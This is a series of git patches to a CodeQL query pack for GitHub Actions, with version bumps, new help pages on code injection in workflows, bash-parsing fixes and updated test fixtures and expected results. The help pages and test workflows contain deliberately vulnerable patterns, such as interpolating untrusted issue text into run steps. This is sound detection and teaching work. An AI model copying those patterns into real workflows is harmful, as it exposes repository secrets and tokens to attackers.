.github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -1221,8 +1484,6 @@ writeToGitHubEnv | VAR1 | $TITLE | VAR1<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | -| VAR5 | Hello\nWorld | VAR5< Date: Thu, 1 Aug 2024 17:49:13 +0200 Subject: [PATCH 0445/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 60 +++++++++++++++++++ .../Security/CWE-094/CodeInjectionMedium.md | 60 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 4 files changed, 122 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-094/CodeInjectionCritical.md create mode 100644 ql/src/Security/CWE-094/CodeInjectionMedium.md diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dff01f80f2b..3a09bb01674 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.29 +version: 0.1.30 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md new file mode 100644 index 00000000000..9939c88eb19 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 00000000000..9939c88eb19 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). +- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1070a8e9a97..b89b197da04 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.29 +version: 0.1.30 groups: [actions, queries] suites: codeql-suites extractor: javascript From 41fade5feb30339cf8d453e7eb1cc0b1c7c57e7b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:44:43 +0200 Subject: [PATCH 0446/1267] feat(bash): Improve bash command parsing --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 2 +- .../.github/workflows/poisonable_steps.yml | 5 + .../library-tests/poisonable_steps.expected | 2 +- ql/test/library-tests/test.expected | 254 ++++++++++-------- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 8 + .../CWE-094/ArgumentInjectionMedium.expected | 5 + 8 files changed, 167 insertions(+), 123 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e05e3a8c41c..5bb94ba8a68 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1243,7 +1243,7 @@ class RunImpl extends StepImpl { RunImpl() { this.getNode().lookup("run") = script } - string getScript() { result = script.getValue() } + string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index fb1ae9af14d..e298865c468 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -92,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index fad7001ad5a..2e971baa050 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -39,3 +39,8 @@ jobs: - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index b164d16b603..0cd71f96ea9 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -30,4 +30,4 @@ | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index dfdd843d8a3..6bedcadcdba 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -8,7 +8,7 @@ workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions @@ -16,14 +16,14 @@ jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -94,7 +94,8 @@ steps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -167,7 +168,8 @@ runSteps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -185,6 +187,7 @@ runExprs | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | @@ -287,7 +290,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -542,142 +546,147 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | 